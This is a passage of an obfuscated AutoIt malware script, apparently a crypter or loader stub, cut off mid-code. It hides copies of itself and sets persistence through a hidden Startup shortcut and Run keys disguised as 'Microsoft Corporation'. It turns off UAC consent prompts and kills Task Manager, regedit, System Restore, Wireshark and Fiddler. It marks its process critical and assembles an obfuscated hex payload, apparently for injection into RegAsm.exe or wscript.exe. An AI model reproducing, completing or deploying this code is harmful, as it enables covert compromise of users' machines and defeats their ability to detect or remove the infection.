FileMove(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPL, @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) If $GgUIfbdZDaLMfMWIhAWe = "true" Then FileCreateShortcut(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, @StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi) FileSetAttrib(@StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".lnk", "+SH") EndIf If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAH = "true" Then FileSetAttrib(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, "+SH") EndIf ShellExecute(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) ElseIf $GgUIfbdZDaLMfMWIhAWeCPLX = "temp" Then FileDelete(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) FileMove(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPL, @TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) If $GgUIfbdZDaLMfMWIhAWe = "true" Then FileCreateShortcut(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, @StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi) FileSetAttrib(@StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".lnk", "+SH") EndIf If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAH = "true" Then FileSetAttrib(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, "+SH") EndIf ShellExecute(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) ElseIf $GgUIfbdZDaLMfMWIhAWeCPLX = "current" Then FileDelete($cIOcXbXYDeTefBPIID & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) FileMove(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPL, $cIOcXbXYDeTefBPIID & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) If $GgUIfbdZDaLMfMWIhAWe = "true" Then FileCreateShortcut($cIOcXbXYDeTefBPIID & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, @StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi) FileSetAttrib(@StartUpDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".lnk", "+SH") EndIf If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAH = "true" Then FileSetAttrib($cIOcXbXYDeTefBPIID & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP, "+SH") EndIf ShellExecute($cIOcXbXYDeTefBPIID & "\" & $GgUIfbdZDaLMfMWIhAWeC & $GgUIfbdZDaLMfMWIhAWeCP) EndIf EndIf EndIf If $CmdLine[0] = 2 Then If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHX = "true" Then FileDelete($GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhA) EndIf EndIf If @OSVersion = "WIN_XP" = False Then If @OSVersion = "WIN_XPe" = False Then If @OSVersion = "WIN_2003" = False Then If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXI = "true" Then If IsAdmin() = 0 Then ShellExecute(@ComSpec, ' /c ' & @AutoItExe & ' ' & @AppDataDir & '\' & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & '.au3', "", "runas", @SW_HIDE) Exit ElseIf IsAdmin() = 1 Then RegWrite(StringReverse("metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\ERAWTFOS\46ENIHCAM_LACOL_YEKH"), StringReverse("nimdAroivaheBtpmorPtnesnoC"), StringReverse("DROWD_GER"), "" & Chr(48) & "") RegWrite(StringReverse("metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH"), StringReverse("ConsentPromptBehaviorAdmin"), StringReverse("DROWD_GER"), "" & Chr(48) & "") EndIf EndIf EndIf EndIf EndIf If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfe = "true" Then If $CmdLine[0] = 2 Then Execute("Sleep(" & $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQ * 1000 & ")") Else If $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQF = "true" Then Execute("Sleep(" & $ALCPXeUIhKNCHFEVJLCYCEegCYCiIiSYTdNNHMJQSNIgMXaigThcGNfeQ * 1000 & ")") EndIf EndIf EndIf GgUIfbdZDaLMfMWIhAWeCPLXVBGX() If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThS = "true" Then If $CmdLine[0] = 2 Then NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZHg() Else If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZH = "true" Then NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZHg() EndIf EndIf EndIf Func NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZHg() MsgBox($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZ, $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSI, $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIE) EndFunc Func GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUHB($titlename) Local $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH = WinList() For $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU = 1 To $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH[0][0] If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH[$GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU][0] <> "" And BitAND(WinGetState($GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH[$GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU][1]), 2) Then If StringInStr($GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH[$GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU][0], $titlename) = 1 Then Return $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQUH[$GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU][1] EndIf EndIf Next Return False EndFunc If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDf = "true" Then GgUIfbdZDaLMfMWIhAWeCPLXVBG() EndIf If Not FileExists(@TempDir & "\cleanup.txt") Then If $GgUIfbdZDaLMfMWIhAWeCPLXV = "true" Or $GgUIfbdZDaLMfMWIhAWeCPLXVB = "true" Or $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWC = "true" Or $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCa = "true" Or $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJ = "true" Or $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJT = "true" Or $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJTh = "true" Then If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZS = "true" Then GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZh() EndIf While Sleep(200) If Not FileExists(@TempDir & "\cleanup.txt") Then If $GgUIfbdZDaLMfMWIhAWeCPLXV = "true" Then If $cIOcXbXYDeTefBP = 0 And Not ProcessExists("wscript.exe") Then GgUIfbdZDaLMfMWIhAWeCPLXVBGX() If $cIOcXbXYDeTefBP = 2 And Not ProcessExists("RegAsm.exe") Then GgUIfbdZDaLMfMWIhAWeCPLXVBGX() If $cIOcXbXYDeTefBP = 4 And Not ProcessExists("RegAsm.exe") Then GgUIfbdZDaLMfMWIhAWeCPLXVBGX() EndIf If $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZS = "true" Then SaveCopy() EndIf NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZHgC() If $GgUIfbdZDaLMfMWIhAWeCPLXVB = "true" Then GgUIfbdZDaLMfMWIhAWeCPLXVBG() EndIf Else DoCleanup() ExitLoop Exit EndIf WEnd EndIf Else DoCleanup() Exit EndIf Func DoCleanup() For $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU = 0 To UBound(ProcessList("RegAsm.exe")) - 1 ProcessClose("RegAsm.exe") Next For $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZhAHXIQQXZQU = 0 To UBound(ProcessList("wscript.exe")) - 1 ProcessClose("wscript.exe") Next If ProcessExists("winlogon.exe") Then RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Microsoft Corporation " & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ) RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft Corporation " & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ) EndIf FileDelete(@AppDataDir & "\" & $cIOcXbXYDeTef) FileDelete(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3") FileDelete(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe") FileDelete(@TempDir & "\" & $cIOcXbXYDeTef) FileDelete(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3") FileDelete(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe") If FileExists(@TempDir & "\" & StringReverse("tcefnied")) Then FileDelete(@TempDir & "\" & StringReverse("tcefnied")) EndIf If FileExists(@TempDir & "\" & StringReverse("tcefnied")) Then FileWrite(@TempDir & "\" & StringReverse("tcefnied"), @CRLF & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ) Else FileWrite(@TempDir & "\" & StringReverse("tcefnied"), $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ) EndIf EndFunc Func SaveCopy() FileCopy(@AppDataDir & "\" & $cIOcXbXYDeTef, @TempDir & "\" & $cIOcXbXYDeTef) FileCopy(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", @TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3") FileCopy(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", @TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe") FileCopy(@TempDir & "\" & $cIOcXbXYDeTef, @AppDataDir & "\" & $cIOcXbXYDeTef) FileCopy(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3") FileCopy(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe") FileSetAttrib(@AppDataDir & "\" & $cIOcXbXYDeTef, "+SH") FileSetAttrib(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", "+SH") FileSetAttrib(@AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", "+SH") FileSetAttrib(@TempDir & "\" & $cIOcXbXYDeTef, "+SH") FileSetAttrib(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3", "+SH") FileSetAttrib(@TempDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe", "+SH") EndFunc Func NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJThSIEZHgC() If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWC = "true" Then ProcessClose("regedit.exe") EndIf If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCa = "true" Then ProcessClose("taskmgr.exe") EndIf If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJ = "true" Then ProcessClose("rstrui.exe") EndIf If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJT = "true" Then ProcessClose("Wireshark.exe") EndIf If $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbHHRXcAcWDKQZHgBdWCaJTh = "true" Then ProcessClose("Fiddler.exe") EndIf EndFunc Func GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZh() Local $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQ, $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQF, $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZ, $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZb, $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbE $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQ = DllCall("kernel32.dll", "handle", "GetCurrentProcess") $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQF = 0x8000F129 $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZ = 0x21 $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZb = 0x4 $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbE = DllStructCreate("Byte[4]") DllStructSetData($GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbE, 1, $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQF) $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbEZ = DllCall("ntdll.dll", "none", "ZwSetInformationProcess", "int", $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQ[0], "int", $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZ, "int", DllStructGetPtr($GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZbE), "int", $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZSQFZb) EndFunc Func GgUIfbdZDaLMfMWIhAWeCPLXVBG() If ProcessExists("winlogon.exe") Then RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "*") If @error = 1 Then RegWrite(StringReverse("\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), "Microsoft Corporation " & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ, "REG_SZ", '"' & @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe" & '" "' & @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3" & '"') ElseIf @error = -1 Then RegWrite(StringReverse("\ecnOnuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH"), "Microsoft Corporation " & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ, "REG_SZ", '"' & @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfiZ & ".exe" & '" "' & @AppDataDir & "\" & $GgUIfbdZDaLMfMWIhAWeCPLXVBGXDfi & ".au3" & '"') EndIf EndIf EndFunc Func GgUIfbdZDaLMfMWIhAWeCPLXVBGX() If $cIOcXbXYDeTefBP = "0" Then cIOcXbXYDeTe(@SystemDir & "\ws" & StringReverse("exe.tpirc")) ElseIf $cIOcXbXYDeTefBP = "2" Then If FileExists(@WindowsDir & "\Mi" & STRINGREVERSE("exe.msAgeR\72705.0.2v\krowemarF\TEN.tfosorc")) Then cIOcXbXYDeTe(@WindowsDir & "\Mi" & STRINGREVERSE("exe.msAgeR\72705.0.2v\krowemarF\TEN.tfosorc")) Else cIOcXbXYDeTe(@WindowsDir & "\Mi" & STRINGREVERSE("exe.msAgeR\91303.0.4v\krowemarF\TEN.tfosorc")) EndIf ElseIf $cIOcXbXYDeTefBP = "4" Then cIOcXbXYDeTe(@WindowsDir & "\Mi" & STRINGREVERSE("exe.msAgeR\91303.0.4v\krowemarF\TEN.tfosorc")) EndIf EndFunc Func StringReverse( $s_string ) Local $string Local $split = StringSplit( $s_string , '' ) For $b = $split[0] to 1 Step -1 $string &= $split[$b] Next Return $string EndFunc Func cIOcXbXYDeTe($NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZc) Local $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH = "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLVxNBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLVENBIdfeZJgGGTHRLV8NBIdfeZJgGGTHRLV4NBIdfeZJgGGTHRLVENBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVBNBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV" & Chr(53) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV7NBIdfeZJgGGTHRLV2NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVENBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV" & Chr(53) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVCNBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV3NBIdfeZJgGGTHRLV3NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV3NBIdfeZJgGGTHRLV2NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVENBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV7NBIdfeZJgGGTHRLV4NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV4NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVCNBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVCNBIdfeZJgGGTHRLV" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(53) & "NBIdfeZJgGGTHRLVB8NBIdfeZJgGGTHRLVBFC6A42NBIdfeZJgGGTHRLVE8BB" & Chr(48) & "3" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(53) & "42NBIdfeZJgGGTHRLV42889118" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVB" & Chr(53) & "NBIdfeZJgGGTHRLV4242C6A3ENBIdfeZJgGGTHRLVE8AA" & Chr(48) & "3" & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & "89116NBIdfeZJgGGTHRLVA4AE8A1" & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV3NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & "89396A1ENBIdfeZJgGGTHRLV6A3CE8NBIdfeZJgGGTHRLV9D" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A2268F" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV4NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "ENBIdfeZJgGGTHRLV891" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A2NBIdfeZJgGGTHRLV66A24E888" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(48) & "NBIdfeZJgGGTHRLV6A2A6A4NBIdfeZJgGGTHRLV" & Chr(48) & "E87F" & Chr(48) & "3NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLVA2E6A" & Chr(48) & "NBIdfeZJgGGTHRLVCE876" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6NBIdfeZJgGGTHRLVA3268C8" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "ENBIdfeZJgGGTHRLV86A" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLVANBIdfeZJgGGTHRLV2AE8" & Chr(53) & "NBIdfeZJgGGTHRLVC" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8B" & Chr(48) & "9C7NBIdfeZJgGGTHRLV" & Chr(48) & "144NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A12ENBIdfeZJgGGTHRLV84D" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV6NBIdfeZJgGGTHRLV8" & Chr(53) & "BE814CFNBIdfeZJgGGTHRLV" & Chr(53) & "1E879" & Chr(48) & "3NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "6A3EE83BNBIdfeZJgGGTHRLV" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "8BD16A" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV1NBIdfeZJgGGTHRLVEE832" & Chr(48) & "3" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "NBIdfeZJgGGTHRLV6A4" & Chr(48) & "FFNBIdfeZJgGGTHRLV32FF31NBIdfeZJgGGTHRLVFFD" & Chr(48) & "6A12E823" & Chr(48) & "3NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & Chr(48) & "68" $NBIdfeZJgGGTHRLViIReHCUSWicfWePfiIhCQJATccOZcbH &= "NBIdfeZJgGGTHRLV" & Chr(53) & "NBIdfeZJgGGTHRLVNBIdfeZJgGGTHRLVBE814CNBIdfeZJgGGTHRLVF" & Chr(53) & "1E84NBIdfeZJgGGTHRLVF" & Chr(48) & "3" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "6A1NBIdfeZJgGGTHRLVEE811" & Chr(48) & "3" & Chr(48) & "NBIdfeZJgGGTHRLV" & Chr(48) & Chr(48) & Chr(48) & "8B" & 